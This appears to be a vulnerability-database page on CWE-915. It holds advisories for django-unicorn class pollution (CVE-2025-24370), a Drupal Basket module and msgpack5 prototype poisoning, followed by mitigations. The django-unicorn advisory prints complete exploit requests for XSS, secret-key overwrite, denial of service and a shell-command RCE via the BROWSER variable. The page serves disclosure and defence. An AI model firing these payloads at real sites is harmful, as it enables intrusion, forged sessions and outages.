The timed decorator is used to modify many important functions in the django-unicorn, such as _call_method_name.

image-20250121171823756

By polluting the core decorator method timed to a string, you make a function call always call a uncallable string, leading to the backend crashed, thus denial of service attack.

POST /unicorn/message/todo HTTP/1.1

{
  "id": 123,
  "actionQueue": [
    {
      "type": "syncInput",
      "payload": {
        "name": "__init__.__globals__.timed",
        "value": "X"
      }
    }
  ],
  "data": {
    "task": "",
    "tasks": []
  },
  "epoch": "123",
  "checksum": "XXX"
}

dos_attack

#6 Remote Code Execution by Polluting location_cache and OS Environment Variable BROWSER

By polluting the cached data in the location_cache object located at unicorn_view.py, attackers can archieve an arbitrary module importation as the logic executed at _get_component_class function. Then a following pollution on the BROWSER os environment variable will lead to remote code execution when it is combined with antigravity module importation.

  • Pollute location_cache._Cache__data.todo as an array where the first element is the module name imported whenever a GET request is sent to the server.
POST /unicorn/message/todo HTTP/1.1
Host: proof-of-concept:2334
Content-Length: 327
Accept: application/json

{
  "id": "E5FBWqME",
  "data": {
    "task": "",
    "tasks": []
  },
  "checksum": "XvvsDQXX",
  "actionQueue": [
    {
      "type": "syncInput",
      "payload": {
        "name": "__init__.__globals__.location_cache._Cache__data.todo",
        "value": [
          "antigravity",
          "any"
        ]
      },
      "partials": []
    },
    {
      "type": "callMethod",
      "payload": {
        "name": "add"
      },
      "partials": []
    }
  ],
  "epoch": 1746680343776,
  "hash": "CG5pMDxc"
}
  • Pollute BROWSER os environment variable where the payload for command injection is set.
POST /unicorn/message/todo HTTP/1.1
Host: proof-of-concept:2334
Content-Length: 348
Accept: application/json

{
  "id": "E5FBWqME",
  "data": {
    "task": "",
    "tasks": []
  },
  "checksum": "XvvsDQXX",
  "actionQueue": [
    {
      "type": "syncInput",
      "payload": {
        "name": "__init__.__globals__.sys.modules.os.environ",
        "value": {
          "BROWSER": "/bin/sh -c \"touch /tmp/pwned \" #%s"
        }
      },
      "partials": []
    },
    {
      "type": "callMethod",
      "payload": {
        "name": "add"
      },
      "partials": []
    }
  ],
  "epoch": 1746680343776,
  "hash": "CG5pMDxc"
}

django-unicorn-rce

Mitigation

The patch could be:

  • Blocking paths that start with __, which represent double under (dunder) or magic variables/methods
  • Set a blacklist for the path, such as RESTRICTED_KEYS = ("__globals__", "__builtins__") adopted by pydash.

Related Materials

For more information about class pollution please refer to:

[1] CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes

[2] Report: Class Pollution leading to RCE in pydash

[3] Blog: Prototype Pollution in Python

[4] Blog: Class Pollution Gadgets in Jinja Leading to RCE

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "django-unicorn"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.62.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-24370"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-03T15:48:53Z",
    "nvd_published_at": "2025-02-03T21:15:15Z",
    "severity": "CRITICAL"
  },
  "details": "# Summary\n\nDjango-Unicorn is vulnerable to python class pollution vulnerability, a new type of vulnerability categorized under [CWE-915](https://cwe.mitre.org/data/definitions/915.html). The vulnerability arises from the core functionality `set_property_value`, which can be remotely triggered by users by crafting appropriate component requests and feeding in values of second and third parameter to the vulnerable function, leading to arbitrary changes to the python runtime status. \n\nAt least five ways of vulnerability exploitation have been found, stably resulting in Cross-Site Scripting (XSS), Denial of Service (DoS), and Authentication Bypass attacks in almost every Django-Unicorn-based application.\n\n# Analysis of Vulnerable Function\n\nBy taking a look at the vulnerable function `set_property_value` located at: `django_unicorn/views/action_parsers/utils.py`. You can observe the functionality is responsible for modifying a property value of an object. \n\nThe property is specified by a dotted form of path at the second parameter `property_name`, where nested reference to object is supported, and base object and the assigned value is given by the first parameter `component` and third parameter `property_value`.\n\n```python\n# https://github.com/adamghill/django-unicorn/blob/7dcb01009c3c4653b24e0fb06c7bc0f9d521cbb0/django_unicorn/views/action_parsers/utils.py#L10\ndef set_property_value(\n    component,\n    property_name,\n    property_value\n) -\u003e None:\n    ...\n    property_name_parts = property_name.split(\".\")\n    component_or_field = component\n    ...\n    for idx, property_name_part in enumerate(property_name_parts):\n        if hasattr(component_or_field, property_name_part):\n            if idx == len(property_name_parts) - 1:\n                ...\n                setattr(component_or_field, property_name_part, property_value)\n                ...\n            else:\n                component_or_field = getattr(component_or_field, property_name_part)\n                ...\n        elif isinstance(component_or_field, dict):\n            if idx == len(property_name_parts) - 1:\n                component_or_field[property_name_part] = property_value\n\t\t\t\t...\n            else:\n                component_or_field = component_or_field[property_name_part]\n\t\t\t\t...\n        elif isinstance(component_or_field, (QuerySet, list)):\n            property_name_part_int = int(property_name_part)\n\n            if idx == len(property_name_parts) - 1:\n                component_or_field[property_name_part_int] = property_value  # type: ignore[index]\n                ...\n            else:\n                component_or_field = component_or_field[property_name_part_int]  # type: ignore[index]\n                ...\n        else:\n            break\n```\n\nMeanwhile, this functionality can be directly triggered by a component request, one of the core functionalities of the project, by specifying the request type as `syncInput` and payload object would be fed in the dotted-path (2nd) parameter and assigned value (3rd) parameter of the vulnerable function.\n\n```json\nPOST /unicorn/message/COMPONENT_NAME\n\n{\n    \"id\": 123,\n    \"actionQueue\":[\n        {\n          \"type\": \"syncInput\",\n          \"payload\": {\n          \"name\": \"DOTTED_PATH\",\n          \"value\":\"ASSIGNED_VALUE\"\n          }\n    \t\t}\n    ],\n    \"data\": {XXX},\n    \"epoch\": \"123\",\n    \"checksum\": \"XXXX\"\n}\n```\n\nYou are now aware of that users from the remote can fully control the `property_name` and `property_value` of the vulnerable function. By default the preperty value overwrite can only be performed on the component object, which is always the first parameter of the function.\n\nHowever, the functionality failed to count in the situation where bad actors can modify the normal path to traverse to other objects in the python runtime, by leveraging the **magic attributes**. For example, if the `property_name` was set to `__init__.__globals__`, the component context would change to global context of the component module, which means you can modify any attributes of the objects that are located in the global scope of the component module. These objects also include other modules that have been imported in the component module, which comprises of a pollutable dependency chain.\n\nWith all these techniques introduced, you can now change any global objects including, global variables/instances/classes/functions of any module that is in a chain of dependency from the component module.\n\nThe next section introduces the five exploitation gadgets found so far, leading to reflected XSS, stored XSS, authentication bypass and DOS attack. It uses a locally deployed `django-unicorn.com` as demo website to showcase its large-scale impact.\n\n\u003e Here, gadgets refer to the dependency code snippets by default introduced by django-unicorn and changing its status can result in an attack sequence, such as XSS.\n\n# Proof of Concept\n\n## #1 Reflected Cross-Site Scripting by Overwriting bs4 HTML sanitizer\n\nDjango-Unicorn implants the `EntitySubstitution` rule from beautifulsoup4 library into its [HTML formatter](https://github.com/adamghill/django-unicorn/blob/7dcb01009c3c4653b24e0fb06c7bc0f9d521cbb0/django_unicorn/components/unicorn_template_response.py#L125), formatting all the template response messages.\n\n![image-20250121163510422](https://api.2h0ng.wiki:443/noteimages/2025/01/21/16-35-11-a1aa5cfa196383e3a26636eb80bd85f0.png)\n\nWhile [this rule](https://github.com/akalongman/python-beautifulsoup/blob/master/bs4/dammit.py#L79) is specified in a global dictionary, you can exploit the class pollution vulnerability to overwrite it.\n\n```http\nPOST /unicorn/message/todo HTTP/1.1\n\n{\n  \"id\": 123,\n  \"actionQueue\": [\n    {\n      \"type\": \"syncInput\",\n      \"payload\": {\n        \"name\": \"__init__.__globals__.sys.modules.bs4.dammit.EntitySubstitution.CHARACTER_TO_XML_ENTITY.\u003c\",\n        \"value\": \"\u003cimg/src=1 onerror=alert(\u0027bs4_html_entity_bypass\u0027)\u003e\"\n      }\n    }\n  ],\n  \"data\": {\n    \"task\": \"\",\n    \"tasks\": []\n  },\n  \"epoch\": \"123\",\n  \"checksum\": \"XXX\"\n}\n```\n\nIn this demonstration, replaced the sanitizer\u0027s `\u003c` item value with the XSS payload. whenever a template reponse renders a \"\u003c\" in cleartext, it will be converted to the payload, leading to XSS attack.\n\n![bs4-xss](https://api.2h0ng.wiki:443/noteimages/2025/01/21/16-40-56-5ecbe8f2d39a6cc9a546744ca995b2d9.gif)\n\n## #2 Stored Cross-Site Scripting by Overwriting Unicorn Setting and [Django](https://github.com/django/django) Json Script Sanitizer\n\nThere is always a script tag in the webpage. Among it, a `NAME` value is dynamically extracted both from the `MORPHER_NAMES` and `DEFAULT_MORPHER_NAME` variable in the [setting module](https://github.com/adamghill/django-unicorn/blob/7dcb01009c3c4653b24e0fb06c7bc0f9d521cbb0/django_unicorn/settings.py#L12). \n\n![image-20250121165007647](https://api.2h0ng.wiki:443/noteimages/2025/01/21/16-50-08-f2a628f8d06ba81c9bb71f78766cecb7.png)\n\nHowever, simply polluting these values can not lead to a stored XSS attack. Django by default escape some of the special characters into unicode sequences.\n\n![image-20250121164947336](https://api.2h0ng.wiki:443/noteimages/2025/01/21/16-49-47-b756d516b0b3e3d025d876963e1dbf6a.png)\n\nGoing through the source code of django, you will find the actual sanitizer located at `_json_script_escapes` variable at [django/utils/html.py](https://github.com/django/django/blob/862b7f98a02b7973848db578ff6d24ec8500fdb4/django/utils/html.py#L84).\n\n![image-20250121165247245](https://api.2h0ng.wiki:443/noteimages/2025/01/21/16-52-47-b60cd91f46ed89bc7b0a4b3f68521827.png)\n\nBy polluting this variable to clear it out, you finally achieve a stored XSS attack.\n\n![image-20250121165839892](https://api.2h0ng.wiki:443/noteimages/2025/01/21/16-58-40-97608fc15544d68edbfbdc8e61744b12.png)\n\nPoC:\n\n```http\nPOST /unicorn/message/todo HTTP/1.1\n\n{\n  \"id\": \"3gpDSUcxzs1\",\n  \"data\": {\n    \"task\": \"\",\n    \"tasks\": []\n  },\n  \"checksum\": \"XXX\",\n  \"actionQueue\": [\n    {\n      \"type\": \"syncInput\",\n      \"payload\": {\n        \"name\": \"__init__.__globals__.sys.modules.django_unicorn.settings.MORPHER_NAMES\",\n        \"value\": [\n          \"\u003c/script\u003e\u003cscript\u003ealert(\u0027django json unicode escape bypass + configuration overwrite\u0027)\u003c/script\u003e\"\n        ]\n      }\n    },\n    {\n      \"type\": \"syncInput\",\n      \"payload\": {\n        \"name\": \"__init__.__globals__.sys.modules.django_unicorn.settings.DEFAULT_MORPHER_NAME\",\n        \"value\": \"\u003c/script\u003e\u003cscript\u003ealert(\u0027django json unicode escape bypass + configuration overwrite\u0027)\u003c/script\u003e\"\n      }\n    },\n    {\n      \"type\": \"syncInput\",\n      \"payload\": {\n        \"name\": \"__init__.__globals__.sys.modules.django.utils.html._json_script_escapes\",\n        \"value\": {}\n      }\n    }\n  ],\n  \"epoch\": 1737318956605,\n  \"hash\": \"jWGuTFzy\"\n}\n```\n\n![json_unicode_xss](https://api.2h0ng.wiki:443/noteimages/2025/01/21/16-58-59-f8da2463bbaa8de4f305c6fd2235172b.gif)\n\n## #3 Stored Cross-Site Scripting by Overwriting [Django](https://github.com/django/django) Error Page Source Code\n\nDjango by default stores its error page source code in a global variable named `ERROR_PAGE_TEMPLATE` at [django/views/defaults.py](https://github.com/django/django/blob/main/django/views/defaults.py#L16). \n\n![image-20250121170357900](https://api.2h0ng.wiki:443/noteimages/2025/01/21/17-03-58-86c9cf2abfa28f0e1ed479521af5be2e.png)\n\nBy polluting this variable to XSS payload. whenever a user triggers an error in the application, such as access an unexisting resource, the attack payload fires out.\n\n```http\nPOST /unicorn/message/todo HTTP/1.1\n\n{\n  \"id\": 123,\n  \"actionQueue\": [\n    {\n      \"type\": \"syncInput\",\n      \"payload\": {\n        \"name\": \"__init__.__globals__.sys.modules.django.views.defaults.ERROR_PAGE_TEMPLATE\",\n        \"value\": \"\u003chtml\u003e\u003cscript\u003ealert(\u0027error page pollution\u0027)\u003c/script\u003e\u003c/html\u003e\"\n      }\n    }\n  ],\n  \"data\": {\n    \"task\": \"\",\n    \"tasks\": []\n  },\n  \"epoch\": \"123\",\n  \"checksum\": \"XXX\"\n}\n```\n\n![django-404-xss](https://api.2h0ng.wiki:443/noteimages/2025/01/21/17-05-05-e6ce889e7549243a5d8a60877fbb8cff.gif)\n\n## #4 Authentication Bypass by Overwriting [Django](https://github.com/django/django) Secret Key \n\nDjango secret key is typically used to sign and verify session cookies and other security related mechanism. By polluting its runtime value to attacker intended, attacker can forge session cookies to login in to the system as any user.\n\nEven though, django-unicorn.com doesn\u0027t have an authentication layer, you can still observe a successful secret key pollution by inspecting the changed checksum in the HTTP response, since the checksum is generated by encrypting the data field in the request body with the secret key.\n\n```HTTP\nPOST /unicorn/message/todo HTTP/1.1\n\n{\n  \"id\": 123,\n  \"actionQueue\": [\n    {\n      \"type\": \"syncInput\",\n      \"payload\": {\n        \"name\": \"__init__.__globals__.sys.modules.django.template.backends.django.settings.SECRET_KEY\",\n        \"value\": \"test\"\n      }\n    }\n  ],\n  \"data\": {\n    \"task\": \"\",\n    \"tasks\": []\n  },\n  \"epoch\": \"123\",\n  \"checksum\": \"XXX\"\n}\n```\n\n![authentication_bypass](https://api.2h0ng.wiki:443/noteimages/2025/01/21/17-12-20-424da7c5c960471600863828fba93c4a.gif)\n\n## #5 Denial of Service by Overwriting `timed` Decorator Method\n\nThe [timed](https://github.com/adamghill/django-unicorn/blob/7dcb01009c3c4653b24e0fb06c7bc0f9d521cbb0/django_unicorn/decorators.py#L9) decorator is used to modify many important functions in the django-unicorn, such as [_call_method_name](https://github.com/adamghill/django-unicorn/blob/7dcb01009c3c4653b24e0fb06c7bc0f9d521cbb0/django_unicorn/views/action_parsers/call_method.py#L122).\n\n![image-20250121171823756](https://api.2h0ng.wiki:443/noteimages/2025/01/21/17-18-24-0e1cec22199ab2dc1bc9bbcb76d2dcd9.png)\n\nBy polluting the core decorator method `timed`  to a string, you make a function call always call a uncallable string, leading to the backend crashed, thus denial of service attack.\n\n```http\nPOST /unicorn/message/todo HTTP/1.1\n\n{\n  \"id\": 123,\n  \"actionQueue\": [\n    {\n      \"type\": \"syncInput\",\n      \"payload\": {\n        \"name\": \"__init__.__globals__.timed\",\n        \"value\": \"X\"\n      }\n    }\n  ],\n  \"data\": {\n    \"task\": \"\",\n    \"tasks\": []\n  },\n  \"epoch\": \"123\",\n  \"checksum\": \"XXX\"\n}\n```\n\n![dos_attack](https://api.2h0ng.wiki:443/noteimages/2025/01/21/17-20-39-20ab579669a459c7fb54afeab21dcd4e.gif)\n\n## #6 Remote Code Execution by Polluting `location_cache` and OS Environment Variable `BROWSER`\n\nBy polluting the cached data in the `location_cache` object located at [unicorn_view.py](https://github.com/adamghill/django-unicorn/blob/ba2e1de5858f65b7d115f2ba782c220addd47245/django_unicorn/components/unicorn_view.py#L42C1-L43C1), attackers can archieve an arbitrary module importation as the logic executed at [_get_component_class](https://github.com/adamghill/django-unicorn/blob/ba2e1de5858f65b7d115f2ba782c220addd47245/django_unicorn/components/unicorn_view.py#L835) function. Then a following pollution on the `BROWSER` os environment variable will lead to remote code execution when it is combined with `antigravity` module importation.\n\n- Pollute `location_cache._Cache__data.todo` as an array where the first element is the module name imported whenever a `GET` request is sent to the server. \n```HTTP\nPOST /unicorn/message/todo HTTP/1.1\nHost: proof-of-concept:2334\nContent-Length: 327\nAccept: application/json\n\n{\n  \"id\": \"E5FBWqME\",\n  \"data\": {\n    \"task\": \"\",\n    \"tasks\": []\n  },\n  \"checksum\": \"XvvsDQXX\",\n  \"actionQueue\": [\n    {\n      \"type\": \"syncInput\",\n      \"payload\": {\n        \"name\": \"__init__.__globals__.location_cache._Cache__data.todo\",\n        \"value\": [\n          \"antigravity\",\n          \"any\"\n        ]\n      },\n      \"partials\": []\n    },\n    {\n      \"type\": \"callMethod\",\n      \"payload\": {\n        \"name\": \"add\"\n      },\n      \"partials\": []\n    }\n  ],\n  \"epoch\": 1746680343776,\n  \"hash\": \"CG5pMDxc\"\n}\n```\n\n- Pollute `BROWSER` os environment variable where the payload for command injection is set.\n```HTTP\nPOST /unicorn/message/todo HTTP/1.1\nHost: proof-of-concept:2334\nContent-Length: 348\nAccept: application/json\n\n{\n  \"id\": \"E5FBWqME\",\n  \"data\": {\n    \"task\": \"\",\n    \"tasks\": []\n  },\n  \"checksum\": \"XvvsDQXX\",\n  \"actionQueue\": [\n    {\n      \"type\": \"syncInput\",\n      \"payload\": {\n        \"name\": \"__init__.__globals__.sys.modules.os.environ\",\n        \"value\": {\n          \"BROWSER\": \"/bin/sh -c \\\"touch /tmp/pwned \\\" #%s\"\n        }\n      },\n      \"partials\": []\n    },\n    {\n      \"type\": \"callMethod\",\n      \"payload\": {\n        \"name\": \"add\"\n      },\n      \"partials\": []\n    }\n  ],\n  \"epoch\": 1746680343776,\n  \"hash\": \"CG5pMDxc\"\n}\n```\n\n![django-unicorn-rce](https://github.com/user-attachments/assets/8ad88609-c399-4852-8dd4-7fbc59cb28ae)\n\n# Mitigation\n\nThe patch could be:\n\n- Blocking paths that start with `__`,  which represent **double under (dunder)** or **magic variables/methods**\n- Set a blacklist for the path, such as `RESTRICTED_KEYS = (\"__globals__\", \"__builtins__\")` adopted by [pydash](https://github.com/dgilland/pydash/blob/f4112f61ddb02e5181e781709d775838c9978b97/src/pydash/helpers.py#L211).\n\n# Related Materials\n\nFor more information about class pollution please refer to:\n\n[1] [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n\n[2] [Report: Class Pollution leading to RCE in pydash](https://gist.github.com/CalumHutton/45d33e9ea55bf4953b3b31c84703dfca)\n\n[3] [Blog: Prototype Pollution in Python](https://blog.abdulrah33m.com/prototype-pollution-in-python/)\n\n[4] [Blog: Class Pollution Gadgets in Jinja Leading to RCE](https://www.offensiveweb.com/docs/programming/python/class-pollution/)",
  "id": "GHSA-g9wf-5777-gq43",
  "modified": "2025-05-08T14:33:23Z",
  "published": "2025-02-03T15:48:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/adamghill/django-unicorn/security/advisories/GHSA-g9wf-5777-gq43"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24370"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adamghill/django-unicorn/commit/17614200f27174f789d4af54cc3a1f2b0df7870c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/adamghill/django-unicorn"
    },
    {
      "type": "WEB",
      "url": "https://github.com/adamghill/django-unicorn/releases/tag/0.62.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Django-Unicorn Class Pollution Vulnerability, Leading to XSS, DoS and Authentication Bypass"
}

GHSA-GGC6-38JQ-Q957

Vulnerability from github – Published: 2026-07-10 21:32 – Updated: 2026-07-14 15:32
VLAI
Details

Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal AlternativeCommerce (Basket) allows Object Injection. This issue affects Drupal AlternativeCommerce (Basket) versions: from 0.0.0 to 2.1.17.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-9726"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-10T21:17:00Z",
    "severity": "CRITICAL"
  },
  "details": "Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Drupal Drupal AlternativeCommerce (Basket) allows Object Injection. This issue affects Drupal AlternativeCommerce (Basket) versions: from 0.0.0 to 2.1.17.",
  "id": "GHSA-ggc6-38jq-q957",
  "modified": "2026-07-14T15:32:06Z",
  "published": "2026-07-10T21:32:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9726"
    },
    {
      "type": "WEB",
      "url": "https://www.drupal.org/sa-contrib-2026-038"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GMJW-49P4-PCFM

Vulnerability from github – Published: 2021-03-12 22:44 – Updated: 2021-03-12 16:57
VLAI
Summary
Prototype poisoning
Details

Impact

The issue is as follows: when msgpack5 decodes a map containing a key "__proto__", it assigns the decoded value to __proto__. As you are no doubt aware, Object.prototype.__proto__ is an accessor property for the receiver's prototype. If the value corresponding to the key __proto__ decodes to an object or null, msgpack5 sets the decoded object's prototype to that value.

An attacker who can submit crafted MessagePack data to a service can use this to produce values that appear to be of other types; may have unexpected prototype properties and methods (for example length, numeric properties, and push et al if __proto__'s value decodes to an Array); and/or may throw unexpected exceptions when used (for example if the __proto__ value decodes to a Map or Date). Other unexpected behavior might be produced for other types.

There is no effect on the global prototype.

An example:

const msgpack5 = require('msgpack5')(); 

const payload = {}; 
Object.defineProperty(payload, '__proto__', { 
value: new Map().set(1, 2), 
enumerable: true 
}); 

const encoded = msgpack5.encode(payload); 
console.log(encoded); // <Buffer 81 a9 5f 5f 70 72 6f 74 6f 5f 5f 81 01 02> 

const decoded = msgpack5.decode(encoded); 

// decoded's prototype has been overwritten 
console.log(Object.getPrototypeOf(decoded)); // Map(1) { 1 => 2 } 
console.log(decoded.get); // [Function: get] 

// decoded appears to most common typechecks to be a Map 
console.log(decoded instanceof Map); // true 
console.log(decoded.toString()); // [object Map] 
console.log(Object.prototype.toString.call(decoded)); // [object Map] 
console.log(decoded.constructor.name); // Map 
console.log(Object.getPrototypeOf(decoded).constructor.name); // Map 

// decoded is not, however, a Map 
console.log(Object.getPrototypeOf(decoded) === Map.prototype); // false 

// using decoded as though it were a Map throws 
try { 
decoded.get(1); 
} catch (error) { 
console.log(error); // TypeError: Method Map.prototype.get called 
// on incompatible receiver #<Map> 
} 
try { 
decoded.size; 
} catch (error) { 
console.log(error); // TypeError: Method get Map.prototype.size 
// called on incompatible receiver #<Map> 
} 

// re-encoding the decoded value throws 
try { 
msgpack5.encode(decoded); 
} catch (error) { 
console.log(error); // TypeError: Method Map.prototype.entries 
// called on incompatible receiver #<Map> 
} 

This "prototype poisoning" is sort of a very limited inversion of a prototype pollution attack. Only the decoded value's prototype is affected, and it can only be set to msgpack5 values (though if the victim makes use of custom codecs, anything could be a msgpack5 value). We have not found a way to escalate this to true prototype pollution (absent other bugs in the consumer's code).

Patches

Versions v5.2.1, v4.5.1, v3.6.1 include the fix.

Workarounds

Always validate incoming data after parsing before doing any processing.

For more information

If you have any questions or comments about this advisory: * Open an issue in example link to repo * Email us at example email address

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "msgpack5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "msgpack5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "msgpack5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21368"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-12T16:57:44Z",
    "nvd_published_at": "2021-03-12T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nThe issue is as follows: when `msgpack5` decodes a map containing a \nkey `\"__proto__\"`, it assigns the decoded value to `__proto__`. As you \nare no doubt aware, `Object.prototype.__proto__` is an accessor \nproperty for the receiver\u0027s prototype. If the value corresponding to \nthe key `__proto__` decodes to an object or `null`, `msgpack5` sets \nthe decoded object\u0027s prototype to that value. \n\nAn attacker who can submit crafted MessagePack data to a service can \nuse this to produce values that appear to be of other types; may have \nunexpected prototype properties and methods (for example `length`, \nnumeric properties, and `push` et al if `__proto__`\u0027s value decodes to \nan `Array`); and/or may throw unexpected exceptions when used (for \nexample if the `__proto__` value decodes to a `Map` or `Date`). Other \nunexpected behavior might be produced for other types. \n\nThere is no effect on the global prototype.\n\nAn example: \n\n```js \nconst msgpack5 = require(\u0027msgpack5\u0027)(); \n\nconst payload = {}; \nObject.defineProperty(payload, \u0027__proto__\u0027, { \nvalue: new Map().set(1, 2), \nenumerable: true \n}); \n\nconst encoded = msgpack5.encode(payload); \nconsole.log(encoded); // \u003cBuffer 81 a9 5f 5f 70 72 6f 74 6f 5f 5f 81 01 02\u003e \n\nconst decoded = msgpack5.decode(encoded); \n\n// decoded\u0027s prototype has been overwritten \nconsole.log(Object.getPrototypeOf(decoded)); // Map(1) { 1 =\u003e 2 } \nconsole.log(decoded.get); // [Function: get] \n\n// decoded appears to most common typechecks to be a Map \nconsole.log(decoded instanceof Map); // true \nconsole.log(decoded.toString()); // [object Map] \nconsole.log(Object.prototype.toString.call(decoded)); // [object Map] \nconsole.log(decoded.constructor.name); // Map \nconsole.log(Object.getPrototypeOf(decoded).constructor.name); // Map \n\n// decoded is not, however, a Map \nconsole.log(Object.getPrototypeOf(decoded) === Map.prototype); // false \n\n// using decoded as though it were a Map throws \ntry { \ndecoded.get(1); \n} catch (error) { \nconsole.log(error); // TypeError: Method Map.prototype.get called \n// on incompatible receiver #\u003cMap\u003e \n} \ntry { \ndecoded.size; \n} catch (error) { \nconsole.log(error); // TypeError: Method get Map.prototype.size \n// called on incompatible receiver #\u003cMap\u003e \n} \n\n// re-encoding the decoded value throws \ntry { \nmsgpack5.encode(decoded); \n} catch (error) { \nconsole.log(error); // TypeError: Method Map.prototype.entries \n// called on incompatible receiver #\u003cMap\u003e \n} \n``` \n\nThis \"prototype poisoning\" is sort of a very limited inversion of a \nprototype pollution attack. Only the decoded value\u0027s prototype is \naffected, and it can only be set to `msgpack5` values (though if the \nvictim makes use of custom codecs, anything could be a `msgpack5` \nvalue). We have not found a way to escalate this to true prototype \npollution (absent other bugs in the consumer\u0027s code). \n\n### Patches\n\nVersions v5.2.1, v4.5.1, v3.6.1 include the fix.\n\n### Workarounds\n\nAlways validate incoming data after parsing before doing any processing.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [example link to repo](http://example.com)\n* Email us at [example email address](mailto:example@example.com)",
  "id": "GHSA-gmjw-49p4-pcfm",
  "modified": "2021-03-12T16:57:44Z",
  "published": "2021-03-12T22:44:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mcollina/msgpack5/security/advisories/GHSA-gmjw-49p4-pcfm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21368"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mcollina/msgpack5/commit/d4e6cb956ae51c8bb2828e71c7c1107c340cf1e8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mcollina/msgpack5/releases/tag/v3.6.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mcollina/msgpack5/releases/tag/v4.5.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mcollina/msgpack5/releases/tag/v5.2.1"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/msgpack5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype poisoning"
}

Mitigation
Implementation
  • If available, use features of the language or framework that allow specification of allowlists of attributes or fields that are allowed to be modified. If possible, prefer allowlists over denylists.
  • For applications written with Ruby on Rails, use the attr_accessible (allowlist) or attr_protected (denylist) macros in each class that may be used in mass assignment.
Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

Strategy: Input Validation

For any externally-influenced input, check the input against an allowlist of internal object attributes or fields that are allowed to be modified.

Mitigation
Implementation Architecture and Design

Strategy: Refactoring

Refactor the code so that object attributes or fields do not need to be dynamically identified, and only expose getter/setter functionality for the intended attributes.

No CAPEC attack patterns related to this CWE.